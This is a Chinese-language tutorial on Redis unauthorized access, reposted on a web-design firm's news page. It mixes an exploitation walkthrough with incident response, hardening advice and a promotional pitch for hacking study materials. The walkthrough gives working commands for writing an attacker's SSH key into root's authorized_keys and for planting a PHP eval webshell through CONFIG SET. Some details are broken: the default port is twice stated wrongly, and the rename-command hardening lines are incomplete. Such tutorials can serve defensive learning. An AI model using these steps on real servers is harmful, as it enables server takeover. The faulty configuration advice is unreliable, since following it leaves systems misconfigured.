资讯动态

Redis 未授权访问漏洞详解|漏洞复现 + 提权攻击 + 应急响应 + 全套安全加固

发布时间:2026/9/24 14:14:38 来源:尧图企业网站定制
前言Redis 是目前互联网使用最广泛的高性能内存数据库常用于缓存、会话存储、热点数据存储。但绝大多数企业、运维人员因为默认配置不当导致 Redis 暴露公网、无密码认证产生高危未授权访问漏洞。攻击者可无需任何账号密码直接连接 Redis、读写数据、写入公钥、写入 Webshell、控制服务器是外网渗透、拿下服务器权限最常用的高危漏洞之一。本文从零讲解漏洞原理、危害、完整复现、SSH 公钥提权、Webshell 写入、应急处置、企业级加固方案、实战案例适合新手入门、简历项目、面试复习。一、Redis 未授权访问漏洞危害无密码直接连接默认配置下 Redis 未开启密码认证、未限制 IP攻击者可直接连接数据库读取、清空、篡改全站缓存数据。服务器权限接管高危若 Redis 以root 权限运行攻击者可写入 SSH 公钥文件直接免密登录服务器完全接管服务器权限。植入后门、持久控制可通过写入 crontab 定时任务、写入 Webshell、写入启动项实现长期后门驻留。业务瘫痪、数据泄露恶意攻击者执行flushall清空所有数据导致网站业务崩溃、用户数据丢失、企业重大损失。挖矿木马入侵目前 90% 的 Redis 裸奔服务器都会被自动挖矿脚本扫描植入木马服务器资源被占满、业务卡死。二、漏洞成因核心原理漏洞产生只由三个配置错误导致bind 0.0.0.0对外开放所有 IP不限制访问来源未配置requirepass密码无身份认证protected-mode关闭允许公网匿名访问三者同时满足直接产生高危未授权访问漏洞。三、完整漏洞复现流程3.1 漏洞探测使用 redis-cli 直接连接目标 IPredis-cli -h 目标IP无需密码直接进入终端 存在漏洞3.2 基础操作验证# 查看所有键值 keys * # 查看服务器信息 info # 清空所有数据危险操作 flushall3.3 高危提权SSH 公钥免密登录经典攻击链攻击原理Redis 可自定义写入文件将攻击者公钥写入服务器 root 的.ssh/authorized_keys实现免密登录服务器。攻击步骤# 生成本地密钥 ssh-keygen # 写入公钥内容到redis set x \n\n公钥内容\n\n # 设置存储路径为root的ssh目录 config set dir /root/.ssh/ config set dbfilename authorized_keys # 保存落地 save攻击成功后攻击者直接ssh root目标 IP登录服务器拿下最高权限。3.4 网站根路径写入 Webshell如果 Redis 运行权限为网站用户、且知道网站绝对路径config set dir /var/www/html/ config set dbfilename shell.php set shell ?php eval($_POST[cmd]);? save直接生成可执行的网站后门。四、服务器被攻击后 —— 应急响应步骤4.1 紧急阻断攻击必做修改绑定地址禁止公网访问bind 127.0.0.1重启 Redis 服务立刻阻断攻击者连接。4.2 快速设置强密码requirepass StrongRedis1234.3 清理恶意数据与后门# 查看所有恶意键 keys * # 删除恶意键 DEL x flushdb4.4 检查服务器后门检查/root/.ssh/authorized_keys是否存在陌生公钥检查定时任务crontab -l是否存在挖矿脚本检查网站目录是否存在陌生 shell 文件4.5 升级 Redis 版本升级至最新稳定版修复官方历史漏洞。五、企业级全套安全加固方案生产环境直接用5.1 开启 IP 绑定禁止全网访问bind 127.0.0.1仅本机业务调用杜绝公网访问。5.2 开启强密码认证密码必须包含大小写字母 数字 特殊符号5.3 开启保护模式protected-mode yes5.4 修改默认端口默认 16379 极易被扫描建议自定义高端口port 258885.5 防火墙限制 IP仅允许业务服务器 IP 访问 Redis 端口屏蔽全网。5.6 禁用高危系统命令重中之重在 redis.conf 末尾添加rename-command CONFIG rename-command FLUSHALL rename-command FLUSHDB rename-command KEYS rename-command SHUTDOWN rename-command DEBUG 直接封死攻击者提权、篡改、读取路径的所有通道5.7 禁止 Root 权限运行 Redis新建普通用户启动 Redis即使被入侵无法提权服务器。5.8 定期 RDB/AOF 备份定时备份数据防止恶意删库跑路。5.9 部署内网 VPC 隔离Redis 属于核心数据库严禁暴露公网必须内网部署。六、真实实战攻击案例案例场景某企业运维默认安装 Redis未改配置、未设密码、端口全开。攻击流程攻击者端口扫描发现 16379 开放直接连接 Redis 未授权访问读取网站缓存、账号密码信息写入 SSH 公钥拿下服务器 root 权限植入挖矿木马、定时驻留后门服务器资源爆满、业务瘫痪最终后果服务器被挖矿算力耗尽业务卡顿、网站宕机用户数据泄露服务器被长期控制七、漏洞总结 面试高频考点1. 漏洞核心配置不当导致无认证、无 IP 限制、可任意读写文件2. 危害等级高危漏洞可直接拿下服务器权限3. 核心利用方式SSH 公钥写入提权网站目录写入 Webshell定时任务植入木马恶意清空数据4. 最有效防御禁用 CONFIG 命令 绑定本地 IP 强密码 非 root 运行结语Redis 未授权访问是网络安全面试必考、外网渗透最高频、挖洞最容易出分的经典高危漏洞。看似简单的配置疏忽可直接导致服务器被沦陷、数据泄露、业务瘫痪。作为安全人员必须熟练掌握漏洞原理、复现、提权攻击、应急处置、全套加固方案。免责声明本文仅用于网络安全合法学习与企业安全加固禁止用于未授权攻击违者自负法律责任。最后关于网络安全技术储备网络安全是当今信息时代中非常重要的一环。无论是找工作还是感兴趣黑客都是未来职业选择中上上之选为了保护自己的网络安全学习网络安全知识是必不可少的。如果你是准备学习网络安全黑客或者正在学习下面这些你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价